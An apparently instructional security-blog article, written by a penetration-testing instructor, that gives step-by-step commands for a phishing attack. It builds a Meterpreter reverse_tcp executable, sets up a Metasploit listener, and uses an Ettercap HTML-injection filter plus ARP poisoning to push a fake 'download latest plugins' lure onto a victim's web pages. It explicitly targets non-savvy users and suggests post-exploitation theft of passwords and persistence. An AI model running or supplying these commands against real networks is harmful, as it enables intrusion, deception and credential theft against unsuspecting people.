Phishing with Meterpreter and Ettercap

By   ISBuzz Team
Writer , Information Security Buzz | Dec 02, 2013 03:16 am PST

To phish or not to phish? That is the question. If you’re looking to attack someone who’s not very computer savvy, then phishing is the easiest way to go about it. Instead of using a zero-day that could take you hours to write or trying to find a computer with an exploitable service, why not make them connect to you? Using a Meterpreter payload and Ettercap, you can easily fool someone into exploiting their own system for your benefit. What are you waiting on? Let’s go phishing!

In this video, I teach you how to phish. Using a Kali Linux Virtual Machine, a Windows XP SP3 Virtual Machine, the Metasploit framework, an Apache2 webserver, and Ettercap, I conduct a simple but effective phishing attack. Using a Meterpreter reverse_tcp payload from the Metasploit Framework, I create an executable file for windows (.exe) and save it so I can use it in my webserver. I used a reverse_tcp shell because I want the target computer to connect back to my computer.


The steps for the first part of this video (The setup of the executable and server) are as follows:

Open a terminal in Kali and type this command:

~# /etc/init.d/apache2 start

This starts up your webserver to serve up whatever is put into the /var/www/ directory.

I then used the msfconsole command to find my payload

~# msfconsole

msf> show payloads

From there, I set my sights on windows/meterpreter/reverse_tcp and built my executable exploit.

~# msfpayload windows/meterpreter/reverse_tcp LHOST=”Kali IP” LPORT=”Port of your choosing” x > payload.exe

Once that is done, the file is then moved to /var/www/. This means it is now being served up on the webserver. I then set up a multi handler which is a generic payload handler. So I went back to my msfconsole terminal and used these commands.

msf> use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST “kali ip”

set LPORT “port of your choosing” (Must be the same port from when you made your executable)

and then


When this is working, it is now listening for the exploit to call back to your computer. Make sure you don’t touch it until then! We’ll then need to create and compile an ettercap filter. In this video, I used an image of Shaquille O’Neal dancing with Conan O’brien for the sake of the demo, but you can use a quicktime logo, a activex logo or whatever have you to make this attack more believable. In a text file, type this code

if (ip.proto == TCP && tcp.dst == 80) {

if (search(, “Accept-Encoding”)) {

replace(“Accept-Encoding”, “Accept-Nothing!”);




if (ip.proto == TCP && tcp.src == 80) {

if (search(, “<title>”)) {

replace(“</title>”, “</title><form

action=”http://kaliIP/payload.exe” method=”link”><img src=”http://kaliIP/image.gif“><INPUT TYPE=submit value=”DOWNLOAD LATEST PLUGINS!“></form><html><body><h10>You are unable to view some of the web page’s contents. You need to download the latest plugins to fix this issue.</h10></body></html>”);

msg(“html injected”);


This code is saying that if there is a TCP protocol, and the destination is port 80 (HTTP), you need to replace the Accept-Encoding flag to Accept-Nothing! flag, and also, to replace the ending of the <title> form (</title>) to </title><form …  so it can inject the code placed here on the web-page.

Make sure the things in bold are changed to the IPs of your attacking box, images in your webserver directory and whatever you want your button to say. Once done, save it as iframe.filter in your root directory. We’ll then use the program Etterfilter to compile the filter we just made.

Open a terminal and type this command:

~# etterfilter iframe.filter -o iframe.ef

This will compile the filter and make it usuable with Ettercap. After the filter is completely compiled you will then use Ettercap to commence ARP poisoning with said filter.

~# ettercap -T -q -F iframe.ef -M ARP /targetip/ //

This will ARP poison the target computer so whenever it sends a request to a website, it gets what we tossed in the filter through HTML injection. So now, whenever the target computer goes to a HTTP webpage, your image with pop up in the top of the webpage saying that their plugins are out of date and they need to install your executable. If they are gullible enough, they will download your executable payload, and run the executable, it will then connect back to your machine and you will have a shell in your Metasploit Framework terminal. To make it even more believable, right when the target connects to your listen, you can shutdown the Ettercap ARP poison to make it seem like the updates were installed.

If this works, you have successfully tricked the user into downloading and executing a malicious payload giving you a Meterpreter session. From here, you’ll probably want to work on some Post-Exploitation techniques such as pilfering information, usernames/passwords, and persistence. Happy phishing!

About the Author
Christian R. Crank is a cyber security researcher and instructor for Advanced Security by TrainACE. Christian has over five years as a penetration tester and holds a number of industry related certifications.